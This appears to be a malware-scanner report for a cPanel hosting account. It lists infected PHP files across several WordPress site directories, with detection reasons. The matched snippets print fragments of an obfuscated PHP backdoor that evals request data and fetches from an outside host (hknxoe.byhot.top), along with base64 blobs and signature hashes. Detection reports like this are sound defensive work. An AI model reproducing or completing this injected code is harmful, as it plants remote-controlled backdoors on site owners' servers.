Report

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/cpanel3-skel/public_html/themes.php

Size: 1.49 kB Created: 2023-02-18 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/cpanel3-skel/public_html/input.php

Size: 1.49 kB Created: 2023-02-27 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/cpanel3-skel/text.php

Size: 1.49 kB Created: 2023-03-25 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/cpanel3-skel/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/etc/adayinthelife.net/@pwcache/checkbox.php

Size: 1.49 kB Created: 2023-02-07 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/adayinthelife.net/shp/dropdown.php

Size: 1.49 kB Created: 2023-02-11 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/adayinthelife.net/shp/about.php

Size: 1.49 kB Created: 2023-03-15 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/adayinthelife.net/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/etc/peskin.org/cheryl/admin.php

Size: 1.49 kB Created: 2023-09-19 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/peskin.org/ryan/text.php

Size: 1.49 kB Created: 2023-03-29 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/peskin.org/ruthann/text.php

Size: 1.49 kB Created: 2023-05-10 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/peskin.org/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/etc/turtlesys.com/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/etc/turtlesys.net/@pwcache/dropdown.php

Size: 1.49 kB Created: 2023-04-26 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/turtlesys.net/shawndee/input.php

Size: 1.49 kB Created: 2023-09-26 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/etc/turtlesys.net/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

